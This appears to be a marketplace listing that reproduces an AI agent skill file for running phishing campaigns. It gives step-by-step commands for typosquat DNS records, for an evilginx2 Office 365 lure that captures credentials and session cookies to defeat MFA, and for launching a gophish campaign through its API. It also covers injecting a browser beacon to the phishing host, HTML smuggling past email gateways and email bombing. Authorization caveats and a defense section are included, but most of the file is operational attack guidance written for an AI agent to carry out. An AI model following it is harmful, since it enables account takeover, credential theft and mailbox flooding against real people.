Email Security Deep logo

Email Security Deep

Community
brucesongs
email-security-deep

Phishing infrastructure and email gateway bypass covering AiTM MFA interception (evilginx2/modlishka/evilgophish), campaign platforms (gophish/King-Phisher), enterprise gateway evasion (Proofpoint/Mimecast/Cisco ESA/Microsoft Defender for Office), email bombing/DoS, sender reputation engineering, and full-stack campaign operations including landing pages, payload staging, and post-click telemetry — complementary to email-protocol-attack which handles protocol-level forgery.

Overview

Publisherbrucesongs
Repositorykali-claw
Skill nameemail-security-deep
Stars
70
Forks
18
Bundled files
10
LicenseMIT
Links
  • Markdown instructions

    A SKILL.md file the model loads on demand, so it only costs tokens when a request actually matches.

  • Works with any LLM

    AI skills are plain Markdown, not provider-specific code, so this works with GPT, Claude, Gemini, Grok, or a local model.

  • 10 bundled files

    Scripts, templates, and references the model can read while it works. Files are read-only and never executed.

  • Open source

    Published by brucesongs on GitHub. Read the source before you install it.

Installation

Install the Email Security Deep AI skill in TypingMind to use it with any LLM, or drop it into another agent that reads SKILL.md.

1

Install in TypingMind

TypingMind installs a skill straight from its GitHub folder — it reads SKILL.md, bundles the resource files, and stores the result locally.

  1. Open the app and go to Plugins → Skills.
  2. Choose "Install from GitHub".
  3. Paste the skill folder URL below and confirm.
  4. Enable the skill in any chat where you want it available.
Plugins → Skills → Add skill → From GitHub URL, then paste the folder URL and press Continue.
2

Install in another agent

Any agent that reads the Agent Skills format can use this skill — copy the folder into that agent's skills directory.

Claude Code — .claude/skills
git clone --depth 1 https://github.com/brucesongs/kali-claw.git /tmp/kali-claw
mkdir -p .claude/skills
cp -r /tmp/kali-claw/skills/email-security-deep .claude/skills/email-security-deep
Restart Claude Code after copying so it picks up the new skill.

Use it in TypingMind

Enable Email Security Deep in any TypingMind chat and the model takes it from there. Its name and description sit in the system prompt, and the moment a request matches, the model loads the full instructions itself — you never invoke it by hand, and it costs no tokens until it is actually used.

The model loads Email Security Deep on its own as soon as a request matches it.

Works with any AI model

AI skills are plain Markdown instructions rather than provider-specific code, so Email Security Deep is not tied to the model it was written for. Install it once in TypingMind and use it with GPT-5, Claude, Gemini, Grok, DeepSeek, Mistral, Llama, or a local model you run yourself — all on your own API keys.

  • Loaded only when it is needed

    The system prompt carries just the name and description. The instructions are fetched on the first matching request, so an idle skill costs nothing.

  • Switch models mid-chat

    Because the skill is instructions rather than code, changing model does not break it — the next model reads the same SKILL.md.

Skill instructions

This is the SKILL.md content the model loads. Read it before installing — a skill is instructions your model will follow.

Skill: Email Security Deep — Phishing Infrastructure & Gateway Bypass

Supplementary Files:

  • payloads.md — 14 sections: evilginx2 phishlet authoring + AiTM proxy, evilgophish integration, modlishka flexible reverse-proxy, gophish campaign platform + API, King-Phisher alternative platform, gateway evasion (Proofpoint URL Defense / Mimecast / Cisco ESA / Microsoft Defender Safe Links & Safe Attachments), sender reputation engineering (BIMI/ARC/MX), email bombing/DoS, landing-page + payload staging (HTML smuggling, decrypted-on-click), post-click telemetry & beacon design, FIDO2/hardware-key detection and pivot logic, real-world AiTM campaigns (CozyCar / EvilProxy / NakedTenant)
  • test-cases.md — 12 structured test cases (TC-ED-001 through TC-ED-012) covering infrastructure stand-up, AiTM capture, gateway evasion, reputation warm-up, payload delivery, telemetry, and FIDO2 pivot
  • guides/email-security-deep-playbook.md — end-to-end playbook from pretext design through infrastructure build, gateway-evasion tuning, payload staging, AiTM session theft, and clean exit
  • guides/email-security-deep-deep-dive.md — AiTM phishing campaign emulation lab walkthrough (hands-on, step by step, with exercises)

Summary

Email Security Deep covers the campaign-operations layer of email-based compromise: standing up phishing infrastructure (evilginx2, modlishka, evilgophish, gophish, King-Phisher), bypassing enterprise email gateways (Proofpoint, Mimecast, Cisco ESA, Microsoft Defender for Office), executing adversary-in-the-middle MFA bypass, running email-bomb flooding, and engineering sender reputation for spoofing success. This is the application/social-engineering layer above raw SMTP protocol abuse.

Tools: evilginx2, evilgophish, modlishka, gophish, King-Phisher, ThePhish, espoofer (chenjj), MailSpoof, SniperPhish, King-Phisher, mailspoof-check, swaks (for delivery probes), BombErAtom/Email-Bomber, beacon/C2 helper scripts, FIDO2-detection JS payload.

Domain: appsec (application / social layer, not network-protocol layer)

MITRE ATT&CK: T1566-Phishing (Spearfish, Service Spearfish, Spearfish Attachment), T1114-Email Collection, T1059-Automated Command Execution via payload

Differentiation from email-protocol-attack (CRITICAL)

This skill is complementary to skills/email-protocol-attack/, not overlapping. Both deal with email, but at different abstraction layers.

Dimensionemail-protocol-attack (sibling)email-security-deep (this skill)
Abstraction layerProtocol — SMTP/IMAP/POP3/ExchangeApplication — campaign platforms, gateways, browser/AiTM
Primary goalForge, enumerate, relay, compromise mailboxesRun end-to-end phishing campaigns that bypass enterprise email defenses
Mail auth focusSPF/DKIM/DMARC bypass at the protocol level (selector enumeration, p=none exploitation, header manipulation)Sender reputation engineering for spoofing success — BIMI/ARC/MX hygiene, reputation warm-up, gateway-trust abuse
MFA postureNot covered (assumes credential-only)Central — AiTM reverse-proxy MFA token theft (evilginx2/modlishka), FIDO2 detection and pivot
Sample toolsswaks, smtp-user-enum, smtpmap, nailgun, mutt, opensslevilginx2, evilgophish, modlishka, gophish, King-Phisher, espoofer, MailSpoof, SniperPhish, BombErAtom
Gateway thinking"Will this mail server accept my forged mail?""Will Proofpoint/Mimecast/Cisco ESA/Microsoft Defender let this mail reach the inbox, and what URL/attachment rewriting must I defeat?"
OutputForged email delivered, mailbox accessCaptured credential + session cookie (bypassing MFA), campaign telemetry report

Rule of thumb: if the question is "can I make this mail server accept a forged message?"email-protocol-attack. If the question is "can I run a campaign that lands in the inbox AND captures MFA tokens via AiTM?" → this skill. They chain together — protocol-level forgery feeds campaign delivery — but the focus differs.

Also distinct from social-engineering: that skill covers the human-psychology layer (pretext design, vishing, tailgating, USB baiting). This skill is the infrastructure layer: how to actually stand up the phishing platform, route mail past gateways, and capture sessions. Real engagements use both.

Use Cases

  1. Authorized red-team phishing campaign — Stand up a full gophish + evilginx2 stack to test an organization's email gateway, EDR, and user-click response rate, with MFA bypass via AiTM where in-scope.
  2. Email gateway bypass assessment — Deliver a benign payload past Proofpoint URL Defense, Mimecast URL expansion, Cisco ESA sandboxing, and Microsoft Defender Safe Links/Attachments to validate gateway efficacy.
  3. AiTM MFA-bypass simulation — Reproduce EvilProxy / NakedTenant style attacks where session cookies are stolen mid-login via evilginx2 reverse proxy, defeating TOTP/SMS/push MFA.
  4. Sender reputation / spoofing success audit — Audit a client's SPF/DKIM/DMARC/BIMI/ARC posture from the attacker's perspective — what sender identities will the gateway trust, and which can be spoofed.
  5. Email bombing / DoS test — Flood a target's mailbox (with authorization) to measure notification fatigue, gateway rate-limiting, and downstream incident-response behavior.
  6. Phishing landing page + payload staging review — Review HTML-smuggling, decrypted-on-click attachments, and C2 callback patterns used by active threat groups.
  7. FIDO2 / hardware-key resistance test — Detect when a target uses FIDO2 (evilginx2 cannot capture it) and pivot to a different vector (device-code flow, OAuth consent phishing) instead of wasting campaign budget.
  8. Post-click telemetry & campaign measurement — Instrument open/click tracking, beacon design, and C2 callback patterns to produce a metrics report (delivery rate, click rate, credential-capture rate, MFA-bypass rate).
  9. Real-world AiTM campaign reproduction — Reproduce the CozyCar / EvilProxy / NakedTenant kill chain in a lab to validate detection rules and user-training efficacy.
  10. Clean-exit / OPSEC review — After a campaign, ensure no orphaned infrastructure, no leaked credentials in logs, and that all captured session cookies have been lawfully destroyed per engagement scope.

Core Tools

ToolPurposeCommand Example
evilginx2AiTM reverse-proxy phishing — captures credentials + session cookies, bypassing MFAsudo ./evilginx -p phishlets -d
evilgophishCombines evilginx2 + gophish for combined AiTM + campaign management./evilgophish.sh
modlishkaFlexible reverse-proxy with JS template injection for AiTM./modlishka -proxyAddress 0.0.0.0
gophishOpen-source phishing campaign platform (8k+ stars) — templates, sending profiles, landing pages, tracking./gophish (web UI on :3333)
King-PhisherGTK-based phishing campaign management + awareness trainingking-phisher GUI + server
ThePhishAI-assisted phishing classification & response (1.3k stars) — useful for defense-simulationpython3 -m thephish
espoofer (chenjj)SPF/DKIM/DMARC bypass verification (1.7k stars) — verifies spoofing successsudo python3 espoofer.py -i test_email.txt
MailSpoofScripted SPF/DMARC bypass testing for sender reputation auditpython3 mailspoof.py -d target.com
SniperPhishCloud-aware phishing toolkit for O365 / Gmail targetspython3 sniperphish.py
BombErAtom / Email-BomberTargeted email flooding / DoS for notification-fatigue testingpython3 email_bomber.py (with authorization)
mailspoof-check / checkdmarcAudit SPF/DKIM/DMARC/BIMI/ARC/MX posturecheckdmarc target.com
swaks (delivery probe)SMTP injection probe for gateway-bypass testing — used here as a delivery probe, not for protocol abuseswaks --to victim@target.com --body @payload.txt
FIDO2-detection JS payloadBrowser-side script to detect PublicKeyCredential.isUserVerifyingPlatformAuthenticatorAvailable() and signal C2 to pivotInline JS in landing page
Beacon / C2 helper scriptsPost-click callback, session-cookie exfil, and campaign telemetry aggregationCustom (see payloads.md Section 13)

Methodology

Six-Phase Campaign Operations Workflow

Phase 1           Phase 2           Phase 3           Phase 4           Phase 5           Phase 6
Pretext &         Infrastructure    Gateway           Payload           AiTM /            Exfil & Exit
Target Profiling  Stand-up          Evasion Tuning    Delivery          Click-Time        (Clean Exit)
     │                 │                 │                 │                 │                 │
     ▼                 ▼                 ▼                 ▼                 ▼                 ▼
OSINT target       gophish +         Proofpoint URL    HTML smuggling,   evilginx2 phishlet Session cookie
list, pretext      evilginx2 on      Defense bypass,   decrypted-on-     served on look-   rotation, telemetry
narrative,         VPS, domain       Mimecast auth     click attachment,  alike domain,     report, evidence
landing copy       registration,     posture,          gateway-trusted    MFA token live    destruction, infra
                   TLS, redirectors  Defender Safe     sender identity,   capture,          teardown
                                     Links / Safe      landing-page      FIDO2 detection   ──────────────
                                     Attachments       staging           & pivot

Phase 1: Pretext & Target Profiling — Build the campaign narrative. Use OSINT (LinkedIn, theHarvester, recon-ng — see skills/osint/, skills/social-engineering/) to enumerate recipients, then craft a pretext (IT password reset, package delivery, executive urgent directive, shared-doc notification). Define the desired post-click action (credential submit, MFA approval, payload execute).

Phase 2: Infrastructure Stand-up — Register look-alike domains (micros0ft-login.com, paypa1-verify.com), obtain TLS certs (Let's Encrypt or pre-staged wildcards), configure DNS (A, MX, SPF, DKIM, DMARC for the spoofed identity if reputation-tolerant), and deploy gophish + evilginx2 on a hardened VPS with redirectors to mask the true origin IP.

Phase 3: Gateway Evasion Tuning — Pre-flight each gateway the target uses. Proofpoint rewrites URLs (urldefense.proofpoint.com/v2/url?u=...) — test that your landing domain survives rewriting and that the un-rewritten click-through works. Mimecast expands URLs at click time and may sandbox. Cisco ESA runs attachment sandboxing. Microsoft Defender Safe Links rewrites and Safe Attachments detonates. Tune sender reputation (DKIM-signed, SPF-aligned, DMARC-aligned, BIMI if applicable, warmed-up IP) until deliverability is acceptable.

Phase 4: Payload Delivery — Send the campaign via gophish (or evilgophish combined stack). For payloads, prefer HTML smuggling (the attachment contains JS that reconstructs the malicious binary client-side — gateway sees only benign HTML/JS) and decrypted-on-click attachments (encrypted zip that the gateway cannot unzip without the password). Track opens (1x1 beacon) and clicks (redirect link).

Phase 5: AiTM / Click-Time — When a victim clicks through to the AiTM landing page, evilginx2 proxies the login to the real service, captures the credential, captures the MFA token (live, as the victim completes MFA), and — critically — captures the session cookie that authenticates the victim post-MFA. The attacker then imports the session cookie into their own browser and is now logged in as the victim, having "passed" MFA without ever needing to phish the MFA secret itself.

If the target uses FIDO2 (isUserVerifyingPlatformAuthenticatorAvailable() returns true and the visible MFA prompt is a security key, not a TOTP/push), AiTM will fail — detect this in-browser and pivot to device-code flow, OAuth consent phishing, or a different target. Document this in the report as a control strength.

Phase 6: Exfil & Exit — Aggregate captured sessions, rotate session cookies into a separate browser profile, perform authorized post-exploitation (per engagement scope), then tear down infrastructure: destroy captured credentials/cookies per the engagement scope, delete gophish database, revoke DNS, retire VPS, and produce the campaign telemetry report (delivery rate, open rate, click rate, credential-capture rate, MFA-bypass rate, FIDO2-blocked count).

Quick Selection Guide

ScenarioPrimary ApproachAlternative
MFA-protected O365 tenantevilginx2 AiTM phishlet for office365modlishka with O365 template
Need campaign dashboard + email templatinggophish + custom landingevilgophish (combined)
Need to prove gateway bypass worksswaks delivery probe + gateway-evasion sender setupMailSpoof automated bypass test
MFA-bypass fails (FIDO2)Detect & pivot to device-code phishingOAuth consent phishing
Need bulk email flooding (DoS)BombErAtom with rate-limited threadsCustom Python threaded SMTP
Need to verify spoofing successespoofer against client's mail infraMailSpoof + manual swaks
Need landing-page payload stagingHTML smuggling with client-side reconstructionEncrypted-zip with password in separate channel
Need post-click telemetrygophish built-in tracking + custom beaconsCustom C2 callback aggregator
Need to warm up sender reputationGradual ramp on dedicated IP w/ BIMIUse established 3rd-party ESP (Mailgun/SendGrid)
Need clean exitEvidence destruction per SoW, infra teardownTakedown service (e.g., Netcraft)

Practical Steps

Detailed payloads in payloads.md, complete test checklist in test-cases.md. Below is a summary of the six-phase workflow with representative commands.

Step 1: Infrastructure Stand-up

bash
# Register look-alike domain (use authorized registrar only)
# Configure DNS for both spoofing identity and landing page host
# A record for landing host
echo "login.micros0ft-secure.com.   IN  A   198.51.100.10" >> zone.txt
# MX record (for replies if engagement wants reply capture)
echo "micros0ft-secure.com.         IN  MX  10 mail.micros0ft-secure.com." >> zone.txt
# SPF aligned with sending IP
echo 'micros0ft-secure.com.         IN  TXT "v=spf1 ip4:198.51.100.10 -all"' >> zone.txt
# DMARC aligned with SPF
echo '_dmarc.micros0ft-secure.com. IN  TXT "v=DMARC1; p=none; rua=mailto:postmaster@micros0ft-secure.com"' >> zone.txt

# Launch evilginx2 (AiTM reverse proxy)
sudo ./evilginx -p phishlets
# Inside evilginx CLI:
#   config domain micros0ft-secure.com
#   config ip 198.51.100.10
#   phishlets hostname office365 login.micros0ft-secure.com
#   phishlets enable office365
#   lures create office365
#   lures get-url 0

# Launch gophish on the same VPS (or separate)
./gophish  # web UI on https://127.0.0.1:3333
# Default creds admin / gophish (CHANGE FIRST)

Step 2: Gateway Evasion Pre-Flight

bash
# Check client's gateway by sending a probe mail and inspecting received headers
swaks --to probe@target.com --from test@micros0ft-secure.com \
  --server mail.target.com --header "Subject: probe" --body "open me"

# Inspect received headers on the target side
# Look for: X-Proofpoint-Spam-Details, X-Mimecast-, X-IronPort- (Cisco ESA),
#           X-MS-Exchange-Organization- (Defender for Office)

# Verify sender reputation from attacker's side
checkdmarc target.com         # victim's posture
python3 espoofer.py -i test_email.txt --spoof micros0ft-secure.com

# Warm up sender IP gradually (volume ramp over 7 days)
# Day 1-3: low volume to internal test addresses
# Day 4-7: ramp to half campaign volume
# Day 8+: full campaign

Step 3: gophish Campaign Build (API)

bash
# Create sending profile (SMTP relay)
curl -k -X POST https://localhost:3333/api/smtp/ \
  -H "Authorization: Bearer $GOPHISH_API_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "microsoft-relay",
    "host": "mail.micros0ft-secure.com:587",
    "from_address": "Microsoft Security <noreply@micros0ft-secure.com>",
    "username": "sender",
    "password": "staged-cred",
    "headers": {"X-Priority": "1"}
  }'

# Create landing page (redirect to evilginx2 lure URL)
curl -k -X POST https://localhost:3333/api/pages/ \
  -H "Authorization: Bearer $GOPHISH_API_KEY" \
  -d '{
    "name": "office365-login",
    "html": "<html><head><meta http-equiv=\"refresh\" content=\"0; url={{.URL}}\"></head></html>",
    "redirect_url": "https://login.micros0ft-secure.com/lure/0"
  }'

# Create email template
curl -k -X POST https://localhost:3333/api/templates/ \
  -H "Authorization: Bearer $GOPHISH_API_KEY" \
  -d '{
    "name": "urgent-password-reset",
    "subject": "Action Required: Password Expiry in 24h",
    "html": "<html><body>...click <a href=\"{{.URL}}\">here</a>...</body></html>"
  }'

# Launch campaign
curl -k -X POST https://localhost:3333/api/campaigns/ \
  -H "Authorization: Bearer $GOPHISH_API_KEY" \
  -d '{
    "name": "Q2-redteam-001",
    "template": {"name": "urgent-password-reset"},
    "page": {"name": "office365-login"},
    "smtp": {"name": "microsoft-relay"},
    "groups": [{"name": "engineering-team"}]
  }'

Step 4: evilginx2 AiTM Phishlet Authoring (excerpt)

yaml
# phishlets/office365.yaml — simplified excerpt, see payloads.md for full
author: 'kali-claw'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
  - {phish_sub: 'www',   orig_sub: 'www',   domain: 'office.com',         session: true, is_landing: false}
auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
  - domain: '.office.com'
    keys: ['rt', 'rt_Fédérated', 'MSPAuth', 'MSAuth1']
credentials:
  username:
    key: 'login'
    search: '(.*)'
    type: 'post'
  password:
    key: 'passwd'
    search: '(.*)'
    type: 'post'
login:
  domain: 'login.microsoftonline.com'
  path: '/'

Step 5: FIDO2 Detection (browser-side JS)

javascript
// Inject this on the AiTM landing page BEFORE the credential capture completes
async function detectFIDO2() {
  if (!window.PublicKeyCredential) return { fido2: false, reason: 'unsupported' };
  const uvpa = await PublicKeyCredential.isUserVerifyingPlatformAuthenticatorAvailable();
  if (uvpa) {
    // Target likely uses FIDO2 — AiTM will fail to capture session
    // Signal C2 to log this victim and skip session-import attempt
    fetch('https://login.micros0ft-secure.com/beacon/fido2', {
      method: 'POST',
      body: JSON.stringify({victim_id: window.__victim_id__, fido2: true})
    });
  }
  return { fido2: uvpa };
}
detectFIDO2();

Step 6: Email Bombing (DoS — authorized only)

bash
# BombErAtom — target single inbox for notification-fatigue test
python3 email_bomber.py \
  --target victim@target.com \
  --count 200 \
  --threads 8 \
  --delay 2 \
  --provider gmail   # uses Gmail's own SMTP (test mode)

# Detection (defense side):
# Aggregate inbound to victim mailbox per minute
# Alert if > 50 messages/min from diverse senders

Defense Perspective

Defense MeasureDescriptionPriority
FIDO2 / hardware security keysPhishing-resistant — evilginx2/modlishka cannot capture the WebAuthn assertion bound to the legitimate origin. Single strongest control.CRITICAL
Conditional Access — compliant device requiredEven with stolen session cookie, attacker cannot use it from a non-compliant / non-managed device. Drops AiTM effectiveness sharply.CRITICAL
Conditional Access — token binding / continuous access evaluation (CAE)Binds session to device fingerprint; AiTM-captured cookie fails when replayed from a different device.HIGH
Email gateway URL rewriting + click-time reputationProofpoint URL Defense, Mimecast URL expansion, Defender Safe Links — rewrites URLs at click time so a domain that "looked clean" at delivery is re-checked against fresh threat intel. Defeats benign-at-delivery / malicious-at-click.CRITICAL
Safe Attachments / sandbox detonationMicrosoft Defender Safe Attachments, Cisco ESA sandbox — detonates attachments in VM before delivery. Defeats most macro and executable payloads; pairs with HTML-smuggling defense (JS sandbox).HIGH
Strict DMARC (p=reject) + DKIM enforcementStops spoofing at the gateway. Even sender-reputation-engineered attacks must use a look-alike domain (visible to user) rather than spoof the real one.HIGH
BIMI + ARC trust signalsBrand Indicators for Message Identification (visible logo) trains users to expect a visible brand mark; absence becomes a tell. ARC preserves auth across forwarding.MEDIUM
User training — link inspection, FIDO2-first narrativeTrain users to inspect URLs (gateway rewriting makes this hard — supplement with "if it asks for password, verify out-of-band"). Roll out FIDO2 first for high-value accounts.HIGH
Anomalous-session detectionUEBA / Azure AD Identity Protection — flag sessions from new geos, impossible travel, or non-compliant IP even when the cookie is "valid".HIGH
Email-bomb rate limitingGateway-side per-recipient rate limit (e.g., max 10 msgs/min to single inbox from external senders); auto-quarantine floods.MEDIUM
Out-of-band verification for credential entryAny "reset password" / "verify login" flow that arrives via email should require a second channel (push to known device, callback to known number).HIGH

Detection Methods

Advanced Email Threats

  • AiTM (Adversary-in-the-Middle): Reverse proxy traffic to legitimate IdP (Modlishka, Evilginx).
  • BEC patterns: Executive impersonation + urgent wire transfer request.
  • Quishing (QR phishing): QR codes in email body (bypasses URL scanners).
  • Conversation hijacking: Reply to existing thread with malicious link.

SIEM Detection Rules

  • Splunk SPL: index=email | where body matches "(wire transfer|CEO request|urgent)" | stats count by sender
  • SOAR playbooks: Auto-disable user account after click on known-bad URL.
  • Abnormal Security / Armorblox: ML-based email security with BEC detection.

Defense Evasion Techniques

AiTM Phishing

  • Modlishka / Evilginx / Muraena: Reverse proxy to legitimate IdP; capture credentials + session cookies.
  • Cloudflare Workers abuse: Host phishing page on *.workers.dev; inherit Cloudflare reputation.
  • Domain rotation: Use many lookalike domains; rotate as detected.

Quishing Stealth

  • QR code in image: Bypasses email URL scanners (can't extract URL from image).
  • QR code in attachment: PDF attachment with QR code; some scanners don't extract from PDF.
  • Redirect chain: QR → legitimate URL → attacker-controlled redirect.

Thread Hijack

  • Compromise one party: Reply to legitimate thread with malicious content.
  • Email rule creation: Hide replies in custom folder; user doesn't see responses.

Cross-References

  • skills/email-protocol-attack/SKILL.md — Sibling skill. Protocol-level SMTP/IMAP/Exchange abuse (enumeration, forgery, SPF/DKIM/DMARC bypass at protocol level, mailbox compromise). This skill's Phase 2 (sender reputation) builds on email-protocol-attack's protocol-level mail-auth bypass techniques; this skill does NOT re-cover protocol-level bypass — it covers reputation-engineering for spoofing success and campaign-operations on top.
  • skills/social-engineering/SKILL.md — Adjacent skill. Covers the human-psychology layer (pretext design, vishing, USB baiting, OSINT profiling). This skill is the infrastructure layer that executes the pretext via email.
  • skills/password-attack/SKILL.md — Credential attacks against captured credentials (hash cracking, password spraying) — relevant for post-campaign exploitation of harvested credentials.
  • skills/web-auth-bypass/SKILL.md — Session and access-control abuse; relevant for understanding why session-cookie theft (via AiTM) is so damaging.
  • skills/cloud-identity-attack/SKILL.md — O365 / Azure AD / Workspace identity attacks — AiTM-captured O365 sessions feed directly into this skill's cloud-identity post-exploitation.
  • skills/payload-generation/SKILL.md — Payload craft for the attachment path (macros, shellcode, HTA) — this skill handles delivery (HTML smuggling, decrypted-on-click), payload-generation handles what the payload does on execution.
  • skills/av-edr-evasion/SKILL.md — Evasion of endpoint defenses once the payload runs.
  • skills/osint/SKILL.md & skills/recon-osint/SKILL.md — OSINT for recipient enumeration, the input to Phase 1 (pretext).
  • skills/engagement-manager/SKILL.md — Scoping, authorization, rules of engagement for phishing campaigns (CRITICAL — phishing infra is high-risk, must be scoped in writing).

Threat Landscape

The email-security-deep threat landscape is shaped by commodity and APT actors who use AiTM phishing-as-a-service (PaaS) platforms to bypass MFA at scale. Understanding the active actors, their preferred techniques, and their typical infrastructure fingerprints helps red teams emulate realistic campaigns and helps blue teams tune detection rules.

Active Threat Actors and Campaigns (2023-2026)

Actor / CampaignOriginKey TechniquesTargetsDefensive Lesson
EvilProxyRussia (suspected)evilginx2-based PaaS; O365, Google, GMX; bypasses TOTP/push/SMSSMBs, enterprises with mixed MFAFIDO2 defeats them; "require compliant device" CA blocks replay
NakedTenantUnknownAzure AD tenant enumeration + targeted AiTM against non-FIDO2 usersO365 tenants with partial FIDO2 rolloutUniform FIDO2 deployment is the only counter
CozyCar / APT29Russia (SVR)Macro-doc delivery + credential-harvest landing pagesGovernment, think tanks, defenseCombo of payload delivery + landing-page credential theft
Storm-1295Microsoft-trackedConsent phishing via malicious Azure AD appsAny O365 tenantApp consent policies; admin-only consent for high-priv scopes
LAPSUS$ / Scattered SpiderDistributedPush-bombing MFA fatigue + help-desk social engineeringCisco, Nvidia, Okta, MicrosoftNumber-matching push MFA; help-desk verification protocols
BombErAtom clonesCommodityTargeted email flooding as a smokescreen for credential theftAny individual mailboxPer-recipient rate limiting; alert on sender diversity spikes

Common Infrastructure Fingerprints

Indicators that reveal AiTM infrastructure in the wild:

  • TLS certificate age — newly issued (hours/days old) for a look-alike domain
  • Certificate Transparency log entriescrt.sh catches new look-alikes at issuance
  • DNS records — A record + SPF + DMARC p=none on a brand-new domain
  • Hosting provider — bulletproof hosting (e.g., certain Russian, Bulgarian, Moldovan providers) frequently used by PaaS operators
  • Phishlet signatures — specific JS injection patterns used by evilginx2/modlishka

Defensive Counter-Landscape

  • Threat-intel feeds: subscribe to brand-protection services (e.g., ZeroFox, Proofpoint ETP) that flag new typosquat registrations
  • CT log monitoring: monitor crt.sh for certificates matching patterns like micro[s5]oft.*, payp[a4]l.*
  • Gateway reputation feeds: keep Proofpoint/Mimecast/Defender threat intel up to date
  • User reporting pipeline: make it one-click for users to report suspicious mail; route to SOAR for triage
  • AiTM detection rules: see the KQL rule in guides/email-security-deep-deep-dive.md Step 14

Tool Comparison Matrix

Choosing the right tool for each phase depends on the target environment, scope, and depth required.

AiTM Proxy Comparison

ToolPhishlet ModelMFA BypassFIDO2 ResistanceConfigurationUse Case
evilginx2Per-service YAML phishletsTOTP, push, SMSFIDO2 defeats itDeclarative YAMLStandard O365/Google AiTM; most polished
modlishkaGeneric with JS template injectionTOTP, push, SMSFIDO2 defeats itImperative flagsNiche services without phishlets; highly customizable
evilgophishWraps evilginx2 + gophishSame as evilginx2FIDO2 defeats itSingle orchestration scriptCombined AiTM + campaign management

Campaign Platform Comparison

PlatformStrengthWeaknessBest For
gophishOpen-source, REST API, large communityBasic landing-page builderEngineering-led red teams who want API control
King-PhisherGTK desktop UI, awareness-training featuresSmaller communityAwareness training programs, HR-led campaigns
ThePhishAI-assisted classificationDefensive tool, not offensiveSOC teams triaging reported phish
Commercial (Cofense, KnowBe4)Polished, integrated, supportClosed-source, costlyEnterprises wanting turnkey solution

Gateway Bypass Tool Selection

ScenarioRecommended ToolAlternative
Test URL Defense rewritingswaks + custom HTMLMailSpoof
Verify DMARC enforcementcheckdmarcManual dig TXT _dmarc.<domain>
Spoofing success verificationespooferManual swaks with crafted headers
Sender reputation auditmailspoof-checkManual checks across reputation DBs
Attachment sandbox bypassencrypted-zip + swaksHTML smuggling via landing page

Lab and Training Environment

For skill development without risking production systems, use isolated lab environments. The deep-dive guide (guides/email-security-deep-deep-dive.md) provides a complete end-to-end lab walkthrough.

Minimum Lab Setup

  • Microsoft 365 Developer Program tenant — free E5 dev tenant with 25 licenses
  • Linux VPS — Ubuntu 22.04+, 2 vCPU / 4 GB RAM
  • Registered domain — for DNS and TLS (use a clearly fictional one like securitytest.local plus real DNS)
  • Three test users with different MFA factors (TOTP, push, FIDO2) to measure AiTM effectiveness

Recommended Training Path

  1. Read: SKILL.md (this file), payloads.md Sections 1-5
  2. Build lab: guides/email-security-deep-deep-dive.md Steps 1-8
  3. Run campaign: same guide Steps 9-11
  4. Verify FIDO2 resistance: Step 12
  5. Author detection rule: Step 14
  6. Tear down cleanly: Step 15
  7. Exercises: 4 hands-on exercises at the end of the deep-dive

What the Lab Does NOT Cover

For real engagements, additional skills are required:

  • Pretext design and OSINT — see skills/social-engineering/ and skills/osint/
  • Payload craft beyond HTML smuggling — see skills/payload-generation/
  • Endpoint evasion — see skills/av-edr-evasion/
  • Post-exploitation of captured sessions — see skills/cloud-identity-attack/
  • Protocol-level mail-auth bypass — see skills/email-protocol-attack/

Safety Notes

  • AUTHORIZATION IS NON-NEGOTIABLE: Phishing infrastructure is high-risk. Stand up phishing campaigns, AiTM proxies, and email-bomb tools ONLY with a signed Statement of Work that explicitly names the target recipients, the sender identities you may use, the test window, and the data-handling requirements for captured credentials/sessions. Unscoped phishing is a crime in most jurisdictions (US CFAA, UK Computer Misuse Act, EU equivalents) and causes real harm.
  • Capture scope limits: Captured credentials and session cookies are sensitive personal data. Per engagement scope, define: (a) what you may capture, (b) where you store it (encrypted at rest), (c) when you destroy it (typically at engagement close), (d) who may access it (named individuals only).
  • FIDO2 / phishing-resistant auth is the correct control: When your campaign repeatedly fails against a target, that is good — the control is working. Document the failure as a control strength in the report; do not "find a way around" without explicit re-scoping.
  • Email bombing is a DoS: Even with authorization, email bombing consumes victim inbox quota, can bounce legitimate mail, and can interfere with the victim's incident response. Use small volumes (e.g., 100-200 messages) only when the test objective is notification-fatigue measurement, not denial-of-service impact.
  • Real-world AiTM tooling (evilginx2, modlishka) is dual-use: These tools are legitimately used by red teams and security researchers AND by criminal actors. Operating them leaves fingerprints (TLS cert, DNS history, infra IP) that may be flagged by threat intel — operate only from authorized infra and expect detection.
  • Look-alike domains: Registering micros0ft-secure.com is typosquatting and may violate trademark law even with authorization. Where possible, use a clearly-fictional domain (security-test.local) plus an authorized subdomain of the client's own domain (securitytest.client.com) rather than typosquats.
  • Clean exit: At engagement close, destroy captured credentials/cookies per SoW, tear down gophish database, revoke DNS records, retire the VPS, and produce a telemetry report. Leaving phishing infra running invites abuse by third parties.

Hacker Laws

  • Trust but Verify — Email headers and sender display names are forgeable. Gateway rewriting (Proofpoint URL Defense, Safe Links) can itself be a vector if the rewritten URL is manipulated. Verify the true destination of any link out-of-band.
  • Assume Breach — When designing the client's defense, assume the attacker will get a credential. The question is whether they can convert it to a session (AiTM defeats MFA) and whether the session survives device-conditional-access (FIDO2 / CAE defeats AiTM).
  • Defense in Depth — No single email control suffices. Layer gateway rewriting (click-time reputation) + sandbox detonation + strict DMARC + conditional access + FIDO2 + user training. The attacker has to defeat each layer.
  • Economy of Mechanism — Simpler defenses are more reliable. FIDO2 (one primitive, phishing-resistant by design) beats complex multi-step MFA bypass detection.
  • Least Privilege — Recipient Minimization — The fewer recipients in a campaign, the smaller the blast radius if a click occurs. Targeted spearphishing is more effective AND more containable than spray-and-pray.

Learning Resources

Bundled files

The model reads these on demand while the skill is loaded. They are exposed as readable files and are never executed.

Frequently asked questions

What does the Email Security Deep AI skill do?

Phishing infrastructure and email gateway bypass covering AiTM MFA interception (evilginx2/modlishka/evilgophish), campaign platforms (gophish/King-Phisher), enterprise gateway evasion (Proofpoint/Mimecast/Cisco ESA/Microsoft Defender for Office), email bombing/DoS, sender reputation engineering, and full-stack campaign operations including landing pages, payload staging, and post-click telemetry — complementary to email-protocol-attack which handles protocol-level forgery.

Why use Email Security Deep on TypingMind?

